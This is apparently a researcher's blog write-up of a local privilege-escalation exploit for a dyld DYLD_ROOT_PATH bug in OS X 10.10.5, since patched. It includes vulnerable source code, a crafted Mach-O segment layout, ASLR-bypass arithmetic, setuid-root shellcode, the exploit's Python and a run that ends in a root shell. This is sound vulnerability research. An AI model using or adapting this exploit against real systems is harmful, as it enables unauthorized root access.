muymacho - exploiting DYLD_ROOT_PATH
muymacho is an exploit for a dyld bug present in Mac OS X 10.10.5 allowing local privilege escalation to root. It has been patched in El Capitan (10.11).
It was a fun bug and exploit to develop. This post is written as a guide through the process. You can follow along while viewing the dyld source. I hope you enjoy muymacho.
This post covers the various stages of developing the exploit from discovery, past potential problems, to the completed exploit.
… dyld_sim is a Mach-O file, but the exploit produces a dyld_sim that is just muymacho :)
- Discovery
- Vulnerability
- Exploit
- Bypassing ASLR
- Payload
- Finished exploit
- Patch
- Conclusion
- super sekret debug shellcode
- Appendix
Discovery
The bug was discovered during a source code audit of dyld-353.2.1 (10.10.0 to 10.10.4) and continued in IDA Pro with the binary release of the 10.10.5 update. Apple eventually released source for 10.10.5 on 9/17/2015. The post has been updated to include the newer dyld source code.
The interest in dyld came from a challenge @iOn1c posted on 7/20.
I found the bug relating to the DYLD_PRINT_TO_FILE environment variable and wrote an exploit. Shortly afterwards, i0n1c released his writeup and an exploit.
While I was hunting for the DYLD_PRINT_TO_FILE vulnerability, I spotted some questionable code. I went back and discovered a vulnerability related to DYLD_ROOT_PATH. I’m certainly not the first or only person to discover this vulnerability.
Note: I think that this vulnerability may have assigned CVE-2015-5876 (credited to beist of grayhash). See the CVE number section in the appendix for more details.
The DYLD_ROOT_PATH vulnerability is the subject of this post and is detailed in the following sections. It has been patched in El Capitan.
dyld is the dynamic linker for Mac OS X and iOS. It works in conjunction with the system loader to prepare a process for execution. The basic steps are:
- The system loader maps both the binary’s pages and dyld into memory.
- Control is then handed over to dyld, so it can load and link other libraries and their dependencies into the process address space.
- The process loading is complete and execution begins at the executable’s entry point in memory.
During the execution of a suid binary, dyld is running with elevated privileges. The binary has not actually begun executing and thus cannot yet lower privileges.
For more details checkout these references here and here (dyld is much more complex than summarized in this post).
The vulnerability is related to the use of the DYLD_ROOT_PATH environment variable. The following is an excerpt from the dyld man page:
DYLD_ROOT_PATH
This is a colon separated list of directories. The dynamic linker will prepend each of this directory paths to every image access until a file is found.
While the above statement is true, there is an additional use that appears to be undocumented. In order to understand the use, we need to digress into discussing the iOS simulator. Unlike Android which uses an emulator (executes ARM instructions), iOS uses a simulator that runs applications compiled for x86_64. One of the simulator steps replaces the built in dyld with a special iOS simulator version. The special version is creatively called dyld_sim.
In order to to use dyld_sim, the DYLD_ROOT_PATH environment variable is set to a base directory before executing a program.
$ DYLD_ROOT_PATH=/Users/user/tmp crontab
The example above expects dyld_sim to be located off of the base directory at the following location:
/Users/user/tmp/usr/lib/dyld_sim
The details of the vulnerability are in the next section. However, spoiler alert, insufficient validation of the dyld_sim file is to blame. dyld_sim is a Mach-O file, but the exploit produces a dyld_sim that is just muymacho :)
Vulnerability
The majority of this analysis references dyld.cpp from dyld-353.2.3 (10.10.5), with the exception of the 10.10.4 section in the appendix. The bug appears to have been introduced in dyld-239.3 which coincides with the release of OS X 10.9.
The vulnerability is located in the dyld.cpp:useSimulatorDyld() function. If a dyld_sim file exists in the directory specified in the DYLD_ROOT_PATH variable, it’s opened and the resulting file descriptor is passed to useSimulatorDyld().
The code below shows the call from dyld.cpp:_main().
strlcat(simDyldPath, "/usr/lib/dyld_sim", PATH_MAX);
int fd = my_open(simDyldPath, O_RDONLY, 0);
if ( fd != -1 ) {
result = useSimulatorDyld(fd, mainExecutableMH, simDyldPath, argc, argv, envp, apple, startGlue);
if ( !result && (*startGlue == 0) )
halt("problem loading iOS simulator dyld");
The function useSimulatorDyld() is shown below in its entirety. It handles the parsing and loading of dyld_sim. It should be noted that any failures in useSimulatorDyld() cause the process to halt.
__attribute__((noinline))
static uintptr_t useSimulatorDyld(int fd, const macho_header* mainExecutableMH, const char* dyldPath,
int argc, const char* argv[], const char* envp[], const char* apple[], uintptr_t* startGlue)
{
*startGlue = 0;
// verify simulator dyld file is owned by root
struct stat sb;
if ( fstat(fd, &sb) == -1 )
return 0;
// read first page of dyld file
uint8_t firstPage[4096];
if ( pread(fd, firstPage, 4096, 0) != 4096 )
return 0;
// if fat file, pick matching slice
uint64_t fileOffset = 0;
uint64_t fileLength = sb.st_size;
const fat_header* fileStartAsFat = (fat_header*)firstPage;
if ( fileStartAsFat->magic == OSSwapBigToHostInt32(FAT_MAGIC) ) {
if ( !fatFindBest(fileStartAsFat, &fileOffset, &fileLength) )
return 0;
// re-read buffer from start of mach-o slice in fat file
if ( pread(fd, firstPage, 4096, fileOffset) != 4096 )
return 0;
}
else if ( !isCompatibleMachO(firstPage, dyldPath) ) {
return 0;
}
// calculate total size of dyld segments
const macho_header* mh = (const macho_header*)firstPage;
uintptr_t mappingSize = 0;
uintptr_t preferredLoadAddress = 0;
const uint32_t cmd_count = mh->ncmds;
const struct load_command* const cmds = (struct load_command*)(((char*)mh)+sizeof(macho_header));
const struct load_command* cmd = cmds;
for (uint32_t i = 0; i < cmd_count; ++i) {
switch (cmd->cmd) {
case LC_SEGMENT_COMMAND:
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
mappingSize += seg->vmsize;
if ( seg->fileoff == 0 )
preferredLoadAddress = seg->vmaddr;
}
break;
}
cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
}
// reserve space, then mmap each segment
vm_address_t loadAddress = 0;
uintptr_t entry = 0;
if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
return 0;
cmd = cmds;
struct linkedit_data_command* codeSigCmd = NULL;
for (uint32_t i = 0; i < cmd_count; ++i) {
switch (cmd->cmd) {
case LC_SEGMENT_COMMAND:
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
//dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
if ( segAddress == (void*)(-1) )
return 0;
}
break;
case LC_UNIXTHREAD:
{
#if __i386__
const i386_thread_state_t* registers = (i386_thread_state_t*)(((char*)cmd) + 16);
entry = (registers->__eip + loadAddress - preferredLoadAddress);
#elif __x86_64__
const x86_thread_state64_t* registers = (x86_thread_state64_t*)(((char*)cmd) + 16);
entry = (registers->__rip + loadAddress - preferredLoadAddress);
#endif
}
break;
case LC_CODE_SIGNATURE:
codeSigCmd = (struct linkedit_data_command*)cmd;
break;
}
cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
}
if ( codeSigCmd == NULL )
return 0;
fsignatures_t siginfo;
siginfo.fs_file_start=fileOffset; // start of mach-o slice in fat file
siginfo.fs_blob_start=(void*)(long)(codeSigCmd->dataoff); // start of code-signature in mach-o file
siginfo.fs_blob_size=codeSigCmd->datasize; // size of code-signature
int result = fcntl(fd, F_ADDFILESIGS_FOR_DYLD_SIM, &siginfo);
if ( result == -1 ) {
dyld::log("fcntl(F_ADDFILESIGS_FOR_DYLD_SIM) failed with errno=%d\n", errno);
return 0;
}
close(fd);
// notify debugger that dyld_sim is loaded
dyld_image_info info;
info.imageLoadAddress = (mach_header*)loadAddress;
info.imageFilePath = strdup(dyldPath);
info.imageFileModDate = sb.st_mtime;
addImagesToAllImages(1, &info);
dyld::gProcessInfo->notification(dyld_image_adding, 1, &info);
// jump into new simulator dyld
typedef uintptr_t (*sim_entry_proc_t)(int argc, const char* argv[], const char* envp[], const char* apple[],
const macho_header* mainExecutableMH, const macho_header* dyldMH, uintptr_t dyldSlide,
const dyld::SyscallHelpers* vtable, uintptr_t* startGlue);
sim_entry_proc_t newDyld = (sim_entry_proc_t)entry;
return (*newDyld)(argc, argv, envp, apple, mainExecutableMH, (macho_header*)loadAddress,
loadAddress - preferredLoadAddress,
&sSysCalls, startGlue);
}
The purpose of useSimulatorDyld() is to load dyld_sim, perform some validation, and then hand control over to it. dyld_sim begins execution and the original dyld will be no more.
As can be seen in the source above, useSimulatorDyld() does the following:
- Reads in Mach-O headers
- Loops through LC_SEGMENT_64 commands and determines total size
- vm_allocate() memory
- mmap() segments into memory
- Verifies the code signature
- Jumps into the dyld_sim entry point
muymacho exploits a DYLD_ROOT_PATH vulnerability present since 10.9. However, there was an additional attack vector present in versions up to 10.10.4, that has been patched in the 10.10.5 update.
The astute reader will notice that the vulnerability is in the processing of dyld_sim’s Mach-O headers. A malformed Mach-O file allows memory segments to be replaced leading to arbitrary execution of code, which happens prior to signature verification.
In order to understand how the remapping is possible, we need a little review of Mach-O. Apple provides a full Mach-O reference document. However, the two relevant structures are shown below, with the most important one being segment_command_64.
/*
* The 64-bit mach header appears at the very beginning of object files for
* 64-bit architectures.
*/
struct mach_header_64 {
uint32_t magic; /* mach magic number identifier */
cpu_type_t cputype; /* cpu specifier */
cpu_subtype_t cpusubtype; /* machine specifier */
uint32_t filetype; /* type of file */
uint32_t ncmds; /* number of load commands */
uint32_t sizeofcmds; /* the size of all the load commands */
uint32_t flags; /* flags */
uint32_t reserved; /* reserved */
};
/*
* The 64-bit segment load command indicates that a part of this file is to be
* mapped into a 64-bit task's address space. If the 64-bit segment has
* sections then section_64 structures directly follow the 64-bit segment
* command and their size is reflected in cmdsize.
*/
struct segment_command_64 { /* for 64-bit architectures */
uint32_t cmd; /* LC_SEGMENT_64 */
uint32_t cmdsize; /* includes sizeof section_64 structs */
char segname[16]; /* segment name */
uint64_t vmaddr; /* memory address of this segment */
uint64_t vmsize; /* memory size of this segment */
uint64_t fileoff; /* file offset of this segment */
uint64_t filesize; /* amount to map from the file */
vm_prot_t maxprot; /* maximum VM protection */
vm_prot_t initprot; /* initial VM protection */
uint32_t nsects; /* number of sections in segment */
uint32_t flags; /* flags */
};
First useSimulatorDyld() needs to extract the Mach-O header. As can be seen in the source, there is some initial code to determine where the actual header is located in the case of a universal binary. dyld then reads in a page (0x1000 bytes) of data containing the Mach-O header.
After retrieving the header, useSimulatorDyld() processes the load commands. This is accomplished in two loops that cycle through load commands such as LC_SEGMENT_64, LC_UNIXTHREAD, and LC_CODE_SIGNATURE.
The first of the two processing loops is shown below. It looks at LC_SEGMENT_64 load commands. It calculates the total vmsize and determines preferredLoadAddress. If no segments have a fileoff of 0, preferredLoadAddress defaults to 0.
for (uint32_t i = 0; i < cmd_count; ++i) {
switch (cmd->cmd) {
case LC_SEGMENT_COMMAND: // <-- Note: defined in a macro as LC_SEGMENT_64
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
mappingSize += seg->vmsize;
if ( seg->fileoff == 0 )
preferredLoadAddress = seg->vmaddr;
}
break;
}
cmd = (const struct load_command*)(((char*)cmd)+cmd->cmdsize);
}
vm_allocate() is called with the calculated mappingSize. The address of the allocated memory is stored in loadAddress. If the allocation fails, the useSimulatorDyld() function exits.
if ( ::vm_allocate(mach_task_self(), &loadAddress, mappingSize, VM_FLAGS_ANYWHERE) != 0 )
return 0;
After allocating memory, the second loop is encountered and the relevant code can be seen below. This loop also parses LC_UNIXTHREAD and LC_CODESIGNATURE load commands, but they are not relevant to the vulnerability.
The load command that leads to exploitation is LC_SEGMENT_64.
case LC_SEGMENT_COMMAND: // <- this is defined in a macro as LC_SEGMENT_64
{
struct macho_segment_command* seg = (struct macho_segment_command*)cmd;
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
//dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
if ( segAddress == (void*)(-1) )
return 0;
}
Looking at the code, the intended function of the case statement is to map segments into the newly allocated memory. However, there is almost zero validation of the LC_SEGMENT_64 fields. Specifically, the code calculates a requestedLoadAddress based on controllable fields in a Mach-O binary.
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
preferredLoadAddress defaults to 0, leaving only loadAddress and seg->vmaddr in play. The following is a simplified equation that will be used throughout this post in various forms:
requestedLoadAddress = seg->vmaddr + loadAddress
seg->vmaddr is taken directly from the segment command and added to loadAddress (set by vm_allocate). This results in a partially controlled requestedLoadAddress which is then passed to mmap.
mmap is using some very interesting flags, in particular MAP_FIXED. The following is an excerpt from the mmap man page:
MAP_FIXED
Do not permit the system to select a different address than the one specified. If the specified address cannot be used, mmap() will fail. If MAP_FIXED is specified, addr must be a multiple of the pagesize. If a MAP_FIXED request is successful, the mapping established by mmap() replaces any previous mappings for the process’ pages in the range from addr to addr + len. Use of this option is discouraged.
The key words are “replaces any previous mapping”. Mappings such as heaps, the stack, and even executable pages can be replaced. An attacker can create a Mach-O file with crafted LC_SEGMENT_64 load commands. This provides not only partial control of requestedLoadAddress, but also full control of page permissions, filesize, and fileoff.
Manual testing within the debugger confirmed successful replacement of executable pages upon the return of the mmap system call.
Exploit
The following is a cheat sheet, providing a quick reference to various definitions and terms:
CHEAT SHEET
- loadAddress
- address returned by vm_allocate()
- vmaddr
- segment’s vmaddr value (seg->vmaddr)
- mmap_equation
- requestedLoadAddress = vmaddr + loadAddress
Given the ability to replace executable pages in memory, exploitation becomes relatively simple. ROP is not necessary since we control the content of the newly mapped executable pages. Our target page for remapping will be the page containing the mmap system call in dyld. If modern OS X did not have ASLR, this would be trivial. We first cover exploitation without ASLR, then cover how to bypass it
Since dyld is the dynamic linker, it needs to be self contained. dyld includes all the system calls it uses. The useSimulatorDyld() function calls the ::mmap() function (wrapper) which in turn calls ___mmap().
00007FFF5FC2693E mov r12d, ecx
00007FFF5FC26941 mov r8d, r15d
00007FFF5FC26944 call ___mmap
00007FFF5FC26949 mov rbx, rax
00007FFF5FC2694C lea rax, ___syscall_logger
The ___mmap() function contains the mmap system call.
00007FFF5FC26DBC ___mmap proc near ; CODE XREF: _mmap+31p
00007FFF5FC26DBC mov eax, 20000C5h
00007FFF5FC26DC1 mov r10, rcx
00007FFF5FC26DC4 syscall
00007FFF5FC26DC6 jnb short locret_7FFF5FC26DD0
When the mmap system call returns, the instruction pointer will be at address 0x7fff5fc26dc6. Passing mmap a requestedLoadAddress of 0x7fff5fc26000 will replace our targeted mmap system call page. With the segment mapped in, the process begins executing our code.
As shown previously, the requestedLoadAddress is calculated in the second loop like so:
uintptr_t requestedLoadAddress = seg->vmaddr - preferredLoadAddress + loadAddress;
The simplified mmap_equation (preferredLoadAddress defaults to 0) is:
requestedLoadAddress = seg->vmaddr + loadAddress
If we recall, loadAddress is set by the call to vm_allocate. As shown below, vm_allocate returns an address located after the base program’s pages. For example, crontab generates the following memory map:
==== regions for process 44045 (non-writable and writable regions are interleaved)
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
mapped file 0000000100000000-0000000100005000 [ 20K] r-x/rwx SM=COW /Users/user/tmp/crontab
mapped file 0000000100005000-0000000100006000 [ 4K] rw-/rwx SM=COW /Users/user/tmp/crontab
mapped file 0000000100006000-0000000100009000 [ 12K] r--/rwx SM=COW /Users/user/tmp/crontab
VM_ALLOCATE (reserved) 0000000100009000-0000000100029000 [ 128K] rw-/rwx SM=NUL reserved VM address space (unallocated)
STACK GUARD 00007fff5bc00000-00007fff5f400000 [ 56.0M] ---/rwx SM=NUL stack guard for thread 0
Stack 00007fff5f400000-00007fff5fbff000 [ 8188K] rw-/rwx SM=PRV thread 0
Stack 00007fff5fbff000-00007fff5fc00000 [ 4K] rw-/rwx SM=COW
__TEXT 00007fff5fc00000-00007fff5fc37000 [ 220K] r-x/rwx SM=COW /usr/lib/dyld
__DATA 00007fff5fc37000-00007fff5fc3a000 [ 12K] rw-/rwx SM=COW /usr/lib/dyld
__DATA 00007fff5fc3a000-00007fff5fc70000 [ 216K] rw-/rwx SM=PRV /usr/lib/dyld
__LINKEDIT 00007fff5fc70000-00007fff5fc84000 [ 80K] r--/rwx SM=COW /usr/lib/dyld
shared memory 00007fffffe00000-00007fffffe01000 [ 4K] r--/r-- SM=SHM
shared memory 00007fffffeed000-00007fffffeee000 [ 4K] r-x/r-x SM=SHM
Given the memory map above, loadAddress is 0x100009000 (VM_ALLOCATE). Solving for seg->vmaddr results in 0x7ffe5fc1d000, which would replace the dyld executable page at 0x7fff5fc26000.
seg->vmaddr = requestedLoadAddress - loadAddress
seg->vmaddr = 0x7fff5fc26000 - 0x100009000
seg->vmaddr = 0x7ffe5fc1d000
We can craft Mach-O file with a seg->vmaddr value of 0x7ffe5fc1d000 and the exploit would be done.
The above memory map and calculations do not include ASLR in order to simplify discussion. The next section delves into bypassing ASLR.
Bypassing ASLR
The following is an updated cheat sheet. providing a quick reference to various definitions and terms:
CHEAT SHEET
- loadAddress
- address returned by vm_allocate()
- vmaddr
- segment’s vmaddr value (seg->vmaddr)
- dyld_target
- dyld page we are targetting (contains the mmap syscall)
- mmap_equation
- requestedLoadAddress = vmaddr + loadAddress
- ASLR slide
- random offset applied to memory regions
- 0x0000000 to 0xffff000 bytes (0 to 0xffff pages)
The previous section ignores ASLR, which must be considered. ASLR adds slides to various memory regions including executable pages, stack, and the dyld executable pages. This is done to mitigate attacks since there aren’t set memory addresses for resources.
The following is an example of a memory layout with ASLR. Notice how dyld isn’t loaded at its preferred offset unlike the previous vmmap output, and is in fact slid by 0x9f40000 bytes.
==== regions for process 44357 (non-writable and writable regions are interleaved)
REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL
mapped file 0000000102da7000-0000000102dac000 [ 20K] r-x/rwx SM=COW /usr/bin/crontab
mapped file 0000000102dac000-0000000102dad000 [ 4K] rw-/rwx SM=COW /usr/bin/crontab
mapped file 0000000102dad000-0000000102db0000 [ 12K] r--/rwx SM=COW /usr/bin/crontab
VM_ALLOCATE (reserved) 0000000102db0000-0000000102dd0000 [ 128K] rw-/rwx SM=NUL reserved VM address space (unallocated)
STACK GUARD 00007fff58e59000-00007fff5c659000 [ 56.0M] ---/rwx SM=NUL stack guard for thread 0
Stack 00007fff5c659000-00007fff5ce58000 [ 8188K] rw-/rwx SM=ZER thread 0
Stack 00007fff5ce58000-00007fff5ce59000 [ 4K] rw-/rwx SM=COW
__TEXT 00007fff69b09000-00007fff69b40000 [ 220K] r-x/rwx SM=COW /usr/lib/dyld
__DATA 00007fff69b40000-00007fff69b43000 [ 12K] rw-/rwx SM=COW /usr/lib/dyld
__DATA 00007fff69b43000-00007fff69b79000 [ 216K] rw-/rwx SM=PRV /usr/lib/dyld
__LINKEDIT 00007fff69b79000-00007fff69b8d000 [ 80K] r--/rwx SM=COW /usr/lib/dyld
shared memory 00007fffffe00000-00007fffffe01000 [ 4K] r--/r-- SM=SHM
shared memory 00007fffffeed000-00007fffffeee000 [ 4K] r-x/r-x SM=SHM
Other memory regions contain slides. The base binary, crontab, has a 0xda7000 byte slide. The same slide also applies to loadAddress (VM_ALLOCATE region).
Memory regions and ranges
The exploit section solves for the vmaddr value which when added to loadAddress replaces the dyld_target (0x7fff5fc26000) executable page. Our goal is unchanged, we want to map over the dyld_target page with our content. However, we are no longer working with set addresses. We are working with ranges of possible addresses.
Before formulating a plan of attack, we need to determine what the actual memory ranges are. Taking ASLR into account, the possible ranges become:
- loadAddress: 0x100009000 to 0x110008000 (max ASLR slide = 0x0ffff000)
- dyld_target: 0x7fff5fc26000 - 0x7fff6fc25000 (max ASLR slide = 0x0ffff000)
Next, we calculate vmaddr’s possible range of values. We want mmap to replace the dyld_target page, so dyld_target is substituted for requestedLoadAddress in the mmap_equation:
vmaddr = dyld_target - loadAddress
In order to determine the vmaddr range, we solve for both the minimum vmaddr as well as the maximum vmaddr. The following diagram should help illustrate how the range is calculated:
The left hand side of the diagram shows the minimum possible vmaddr. It is uses the lowest possible dyld_target and the highest possible loadAddress.
vmaddr_min = (dyld_target + ASLR_slide_min) - (loadAddress + ASLR_slide_max)
vmaddr_min = (0x7fff5fc26000 + 0x00000000) - (0x100009000 + 0x0ffff000)
vmaddr_min = 0x7fff5fc26000 - 0x110008000
vmaddr_min = 0x7ffe4fc1e000
The right hand side of the diagram shows the maximum possible vmaddr. It is uses the highest possible dyld_target and the lowest possible loadAddress.
vmaddr_max = (dyld_target + ASLR_slide_max) - (loadAddress + ASLR_slide_min)
vmaddr_max = (0x7fff5fc26000 + 0x0ffff000) - (0x100009000 + 0x00000000)
vmaddr_max = 0x7fff6fc25000 - 0x100009000
vmaddr_max = 0x7ffe6fc1c000
The vmaddr range is between 0x7ffe4fc1e000 and 0x7ffe6fc1c000. The entire range covers 0x1fffe000 bytes (twice the maximum ASLR slide).
In order to reliably exploit the vulnerabilty, the complete range of memory may need to be mapped in. It’s impractical to map to the entire range in a single segment (nobody wants a 500+ MB exploit !), so we’ll use multiple segments.
Potential problems
At this point, we have to answer a few more questions :
- How many segments should be used?
- Can mmap fail?
- Can unwanted memory corruption occur?
How many segments should be used?
The Mach-O header is read in as only one page (0x1000 bytes) Given that the mach_header_64 structure is 0x20 bytes and the segment_command_64 structure is 72 bytes, there can be a maximum of 56 segments. In order to simplify calculations, muymacho uses 32 segments. All the segment’s fileoff fields will point to the same data (0x1000000 bytes).
The 32 segments will cover the entire vmaddr range (0x1fffe000) with a page to spare.
TLDR: 32 segments
Can mmap fail?
The portion of useSimulatorDyld()’s code that calls mmap is show again below. Note that the useSimulatorDyld() function exits if the mmap call fails.
void* segAddress = ::mmap((void*)requestedLoadAddress, seg->filesize, seg->initprot, MAP_FIXED | MAP_PRIVATE, fd, fileOffset + seg->fileoff);
//dyld::log("dyld_sim %s mapped at %p\n", seg->segname, segAddress);
if ( segAddress == (void*)(-1) )
return 0;
mmap will fail if it attempts to map memory outside of user space (greater than 0x7fffffffffff). We need to ensure that the following is true:
requestedLoadAddress + seg->filesize < 0x7fffffffffff
Due to ASLR, we don’t know the actual loadAddress and dyld_target addresses. We calculated the minimum (0x7ffe4fc1e000) and maximum (0x7ffe6fc1c000) vmaddr which define the range of offsets we must cover in order to negate ASLR.
To calculate the maximum possible requestedLoadAddress, we use the mmap_equation and plug in the maximum possible vmaddr and the maximum possible loadAddress.
requestedLoadAddress = vmaddr + loadAddress
requestedLoadAddress = 0x7ffe6fc1c000 + (loadAddress + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + (0x100009000 + 0x0ffff000)
requestedLoadAddress = 0x7ffe6fc1c000 + 0x110008000
requestedLoadAddress = 0x7fff7fc24000
A requestedLoadAddress of 0x7fff7fc24000 is well within user space bounds. seg->filesize would need to be greater than 0x803dbfff for the mmap call to fail.
TLDR: mmap is fine :)
Can unwanted memory corruption occur?
Mapping in such large segments (0x1000000), may cause some concern. It really comes down to:
-
Are we going to corrupt the stack while trying to replace dyld_target?
-
What happens if we map over a portion of dyld’s pages?
The implementation section will show that muymacho uses a top down strategy. This approach ensures higher pages get replaced first followed by lower pages. The stack is lower than the dyld_target page in memory and at a safe distance. The stack is fine :)
It is possible that only some of dyld pages get mapped in by a segment. The rest of pages would then be mapped in by the next segment. Does it matter? No.
The mmap system call, the wrapper function, and the majority of the parsing loop from useSimulatorDyld() is all contained in the dyld_target page. The rest of useSimulatorDyld() is at lower page.
TLDR: everything is fine :)
Implementation
muymacho uses 32 segments to cover an address range of 0x20000000 bytes. This ensures that entire ASLR memory range is covered. Segments will be mapped in until the dyld_target page is replaced, at which point our code takes control.
A top down strategy is used to prevent unncessary memory corruption, in particular of the stack. The first segment uses the maximum vmaddr value. Subsequent segments use smaller values, allowing the entire range to be covered. The following graphic provides an example. Keep in mind that it is not to scale. dyld_target is one page while the segments are 4096 pages each.
Eventually dyld_target will be mapped and code execution is achieved. Once the dyld_target page is replaced, control will be instant upon the return of the mmap call.
Maximum vmaddr
The maximum vmaddr used in muymacho differs from what we previously calculated. The following function calculates the maximum vmaddr:
def maximum_vmaddr(segment_size):
'''
returns the maximum vmaddr
the function assumes the base binary is 9 pages long
as is the case for crontab giving a
loadAddress_min of 0x100009000
if attacking other suid programs, this value should
be adjusted. in reality a few pages here or there
won't have a noticeable effect.
'''
dyld_target = 0x7fff5fc26000
loadAddress_min = 0x100009000
aslr_slide_max = 0x0ffff000
dyld_target_max = dyld_target + aslr_slide_max
maximum_offset = dyld_target_max - loadAddress_min
# Only one page from the payload needs to hit the maximum offset.
vmaddr = maximum_offset - segment_size + 0x1000
return vmaddr
The only difference is the following portion of code:
# Only one page from the payload needs to hit the maximum offset.
vmaddr = maximum_offset - segment_size + 0x1000
The original maximum vmaddr calculations assume we are mapping in a single page. We are actually mapping in 4096 pages at a time.
The calculation is adjusted to only map in one page at the maximum vmaddr, otherwise we are wasting pages that will never replace dyld_target.
The following graphic may help clarify the concept:
The left hand side shows the original maximum vmaddr (0x7ffe6fc1c000) replacing the highest possible dyld_target. All the other pages are superflous, since we are already at the maximum possible vmaddr and the highest possible dyld_target. Only one page from this segment could hit a possible dyld_target.
The right hand side uses the adjusted vmaddr (7ffe6ec1d000). The segment will replace the highest possible dyld_target. All 4096 segment pages could replace possible dyld_target pages.
Payload
The Bypassing ASLR section ensures a segment will be mapped over dyld_target. The payload is 0x1000000 or 4096 pages in total. One of those pages will replace the dyld_target page.
The dyld mmap system call is shown again below.
00007FFF5FC26DBC ___mmap proc near ; CODE XREF: _mmap+31p
00007FFF5FC26DBC mov eax, 20000C5h
00007FFF5FC26DC1 mov r10, rcx
00007FFF5FC26DC4 syscall
00007FFF5FC26DC6 jnb short locret_7FFF5FC26DD0
When the mmap system call returns, execution will continue at offset 0xdc6 in the page. Since rax is used as a return value, it will contain the base address of the newly mapped memory. In other words, rax points to the start of our payload.
All 4096 payload pages contain a jmp rax at offset 0xdc6. The first page at the base of the payload also contains the shellcode at offset 0.
The following diagram shows the base page and a standard page.
Regardless of which page lines up with dyld_target, the jmp rax instruction will be executed leading to the shellcode.
The shellcode then performs a setuid(0) syscall call followed by execve(‘/bin/sh’) system call.
Finished exploit
This section combines everything we’ve figured out this far. In summary:
- Our goal is to remap dyld_target, which is the page contain the mmap system call within dyld
- We use 32 segments spanning 0x20000000 bytes to bypass ASLR
- We implement a top down strategy
- The first segment has a vmaddr of 0x7ffe6ec1d000
- Subsequent segments have smaller (0x1000000) vmaddr
- All the segments point to the same 4096 pages of payload
- All pages contain a jmp rax instruction at offset 0xdc6
- The base page contains our shellcode
muymacho is written in python and is available on github. There is a very minimal Mach-O implementation in the MachoFile and LC_SEGMENT_64 classes. They create a dyld_sim file containing 32 segments, all pointing to the payload.
muymacho is passed a base directory and will create the necessary directory structure and dyld_sim file. The actual exploitation requires setting DYLD_ROOT_PATH to the base directory and executing a suid binary. A sample run is shown below.
user@yosemite:~/tmp$ python muymacho.py ~/tmp
muymacho.py - exploit for DYLD_ROOT_PATH vuln in OS X 10.10.5
Luis Miras @_luism
[+] using base_directory: /Users/user/tmp
[+] creating dir: /Users/user/tmp/usr/lib
[+] creating macho file: /Users/user/tmp/usr/lib/dyld_sim
LC_SEGMENT_64: segment 0x00 vm_addr: 0x7ffe6ec1d000
LC_SEGMENT_64: segment 0x01 vm_addr: 0x7ffe6dc1d000
LC_SEGMENT_64: segment 0x02 vm_addr: 0x7ffe6cc1d000
LC_SEGMENT_64: segment 0x03 vm_addr: 0x7ffe6bc1d000
LC_SEGMENT_64: segment 0x04 vm_addr: 0x7ffe6ac1d000
LC_SEGMENT_64: segment 0x05 vm_addr: 0x7ffe69c1d000
LC_SEGMENT_64: segment 0x06 vm_addr: 0x7ffe68c1d000
LC_SEGMENT_64: segment 0x07 vm_addr: 0x7ffe67c1d000
LC_SEGMENT_64: segment 0x08 vm_addr: 0x7ffe66c1d000
LC_SEGMENT_64: segment 0x09 vm_addr: 0x7ffe65c1d000
LC_SEGMENT_64: segment 0x0a vm_addr: 0x7ffe64c1d000
LC_SEGMENT_64: segment 0x0b vm_addr: 0x7ffe63c1d000
LC_SEGMENT_64: segment 0x0c vm_addr: 0x7ffe62c1d000
LC_SEGMENT_64: segment 0x0d vm_addr: 0x7ffe61c1d000
LC_SEGMENT_64: segment 0x0e vm_addr: 0x7ffe60c1d000
LC_SEGMENT_64: segment 0x0f vm_addr: 0x7ffe5fc1d000
LC_SEGMENT_64: segment 0x10 vm_addr: 0x7ffe5ec1d000
LC_SEGMENT_64: segment 0x11 vm_addr: 0x7ffe5dc1d000
LC_SEGMENT_64: segment 0x12 vm_addr: 0x7ffe5cc1d000
LC_SEGMENT_64: segment 0x13 vm_addr: 0x7ffe5bc1d000
LC_SEGMENT_64: segment 0x14 vm_addr: 0x7ffe5ac1d000
LC_SEGMENT_64: segment 0x15 vm_addr: 0x7ffe59c1d000
LC_SEGMENT_64: segment 0x16 vm_addr: 0x7ffe58c1d000
LC_SEGMENT_64: segment 0x17 vm_addr: 0x7ffe57c1d000
LC_SEGMENT_64: segment 0x18 vm_addr: 0x7ffe56c1d000
LC_SEGMENT_64: segment 0x19 vm_addr: 0x7ffe55c1d000
LC_SEGMENT_64: segment 0x1a vm_addr: 0x7ffe54c1d000
LC_SEGMENT_64: segment 0x1b vm_addr: 0x7ffe53c1d000
LC_SEGMENT_64: segment 0x1c vm_addr: 0x7ffe52c1d000
LC_SEGMENT_64: segment 0x1d vm_addr: 0x7ffe51c1d000
LC_SEGMENT_64: segment 0x1e vm_addr: 0x7ffe50c1d000
LC_SEGMENT_64: segment 0x1f vm_addr: 0x7ffe4fc1d000
[+] building payload
[+] dyld_sim successfully created
To exploit enter:
DYLD_ROOT_PATH=/Users/user/tmp crontab
user@yosemite:~/tmp$ DYLD_ROOT_PATH=/Users/user/tmp crontab
bash-3.2#
Patch
El Capitan made many changes to dyld. In particular, the validation on the dyld_sim file is much more strict, closing the vulnerability muymacho uses. There are various checks to ensure that consecutive segments have appropriate fileoff and vmaddr values.
At the time of this post, Apple has not yet released El Capitan source code. The changes can be examined in IDA Pro.
Conclusion
